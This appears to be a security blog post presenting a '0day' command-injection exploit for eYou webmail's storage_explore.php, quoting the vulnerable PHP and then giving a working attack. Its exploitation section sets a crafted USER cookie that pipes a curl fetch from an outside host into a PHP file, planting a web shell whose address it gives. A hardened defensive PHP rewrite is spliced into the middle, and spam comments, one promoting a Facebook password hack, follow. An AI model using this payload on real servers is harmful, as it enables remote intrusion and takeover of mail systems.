『河马』 eYou storage_explore.php Cookie Command Injection Vulnerability Exploitation Tool


File: /user/storage_explore.php
<?php
/**
* User network storage list
*
* This page shows the network storage file list of the logged-in mailbox user; selected files are added to the mail as attachments.
*
* @author FengHui <fenghui@eyou.net>
* @copyright 2008 eYou.net
* @version storage_explore.php 2008/05/19
*/
require_once('/var/eyou/apache/htdocs/config.php');
require_once(PATH.'inc/function.php');
require_once(PATH.'inc/libeyou.php');
require_once(PATH.'inc/operate.php');

$skin               = getCookieUserValue('SKIN');
$uid                = getCookieUserValue('UID');
$domain             = getCookieUserValue('DOMAIN');
$user_dir_path      = getUserDirPath($uid, $domain);
$storage_index_path = $user_dir_path.'/storage/Index/';
$storage_data_path  = $user_dir_path.'/storage/Data/';
$userinfo = get_userinfo($uid , $domain);

// Maximum attachment size the user is allowed to upload
$attachsize = (int)($userinfo['attachsize'][0]);

$is_submit = $_POST['is_submit'] ? true : false;
?>
Following into the getCookieUserValue function:

function getCookieUserValue($key) {
    $user_arr = explode('&', cookie('USER'));
    $n = count($user_arr);
    for ($i = 0; $i < $n; $i++) {
        $g_arr = explode('=', $user_arr[$i]);
        if ($g_arr[0] == $key) {
            return $g_arr[1];
        }
    }
    return null;
}

Following into the cookie function:
function cookie($name){
    if (array_key_exists($name, $_COOKIE)) return $_COOKIE[$name];
    return '';
}

Nothing in this whole path filters the cookie.

The value of USER is pulled straight out of the cookie, and then flows into the getUserDirPath function.

Now look at the getUserDirPath function:

/**
* Get the path of the user's directory
*
* @param string $uid
* @param string $domain
*/
function getUserDirPath($uid, $domain) {
    $cmd = "/var/eyou/sbin/hashid $uid $domain";
    echo $cmd;
    $path = `$cmd`;
    $path = trim($path);
    return $path;
}

uid and domain go straight into the command string (executed via backticks, and also echoed back in the response), which results in command execution.
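The fix a defender would apply to the two functions above is to stop trusting the shape of the USER cookie and to never let its values reach a shell unquoted. The following is an added example, not eYou's code: it replaces the hand-rolled cookie parser with parse_str(), allow-lists the uid and domain before anything else happens, and quotes each argument with escapeshellarg(). It only builds the hashid command string (the /var/eyou/sbin/hashid path is the one on the page) and never executes it, so it runs stand-alone; the character classes for uid and domain are assumptions about what eYou accounts look like and should be adjusted to the deployment.

```php
<?php
// Added example (not eYou's code): hardened replacement for the
// getCookieUserValue()/getUserDirPath() pair on this page.
// Assumption: PHP >= 7.1. Nothing here runs a shell; the command is only built.

declare(strict_types=1);

/**
 * Parse the "USER" cookie (key1=value1&key2=value2) with parse_str() instead of
 * the original explode() loop. Returns null when the key is absent or not a scalar.
 */
function getCookieUserValueSafe(string $cookie, string $key): ?string
{
    parse_str($cookie, $pairs);
    if (!isset($pairs[$key]) || !is_string($pairs[$key])) {
        return null;
    }
    return $pairs[$key];
}

/**
 * Allow-list checks (assumed account format): a uid is letters, digits, dot,
 * dash and underscore; a domain is dot-separated labels of letters, digits and
 * dashes. Shell metacharacters (|, ;, $, backticks, spaces, newlines) never pass.
 */
function isSafeUid(string $uid): bool
{
    return (bool) preg_match('/\A[A-Za-z0-9._-]{1,64}\z/', $uid);
}

function isSafeDomain(string $domain): bool
{
    return (bool) preg_match('/\A[A-Za-z0-9-]{1,63}(\.[A-Za-z0-9-]{1,63})*\z/', $domain);
}

/**
 * Build the command the original getUserDirPath() ran via backticks, but only
 * after validation and with every argument shell-quoted. Throws on bad input
 * so the caller can log the attempt and return an error instead of running it.
 */
function buildHashidCommand(string $uid, string $domain): string
{
    if (!isSafeUid($uid)) {
        throw new InvalidArgumentException('rejected uid: ' . json_encode($uid));
    }
    if (!isSafeDomain($domain)) {
        throw new InvalidArgumentException('rejected domain: ' . json_encode($domain));
    }
    return '/var/eyou/sbin/hashid ' . escapeshellarg($uid) . ' ' . escapeshellarg($domain);
}

// Constructed sample cookies for the demo: one legitimate, one carrying a pipe
// in UID the way the injection described on this page does.
$samples = [
    'SKIN=default&UID=alice&DOMAIN=example.com',
    'SKIN=default&UID=1|id&DOMAIN=example.com',
];

foreach ($samples as $cookie) {
    $uid    = getCookieUserValueSafe($cookie, 'UID') ?? '';
    $domain = getCookieUserValueSafe($cookie, 'DOMAIN') ?? '';
    try {
        echo 'OK   ', buildHashidCommand($uid, $domain), PHP_EOL;
    } catch (InvalidArgumentException $e) {
        // In production: log with client address and return HTTP 400, run nothing.
        echo 'DENY ', $e->getMessage(), PHP_EOL;
    }
}
```

Run with `php hardened_hashid.php`: the first cookie yields `/var/eyou/sbin/hashid 'alice' 'example.com'`, the second is denied before any command string exists. The validation is what matters; escapeshellarg() is defence in depth for the case where the allow-list is later loosened. The `echo $cmd;` debug line in the original should also be removed, since it reflects the full command into the HTTP response.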



Exploitation:

Set the cookie to:

USER=UID=1|curl http://www.isafe.cc:8080/test.txt>>www.isafe.cc.php
Then request localhost/user/storage_explore.php.
The file www.isafe.cc.php is then created under localhost/user/.

The shell address is:

localhost/user/www.isafe.cc.php

[This entry was edited by admin on 2017-10-14 07:51 PM]
Source: original to this site
Tags: 0day
Comments: 167 | Trackbacks: 0 | Views: 14290
admin [2015-02-22 11:40 AM]
thank you
Dusty [2015-02-22 01:35 AM]
Keep up the amazing work !! Lovin' it!
Herbert [2015-02-19 02:27 AM]
How does a skee-ball app make it this high on a list of the best free Android games.
Sports - Tap - the definitive tool for the fans to the sport anywhere in the world. Talking about battery packs, it has an up time of 9.
Skye [2015-02-16 06:46 PM]
Your info is extremely interesting.

Feel free to surf to my blog free facebook hack password download
Swen [2015-02-15 01:02 PM]
Whoa, such a beneficial website.
Jung [2015-02-14 02:03 AM]
Very good web page you have going here.
Cathleen [2015-02-13 02:29 AM]
Hi, very good online site you've going here.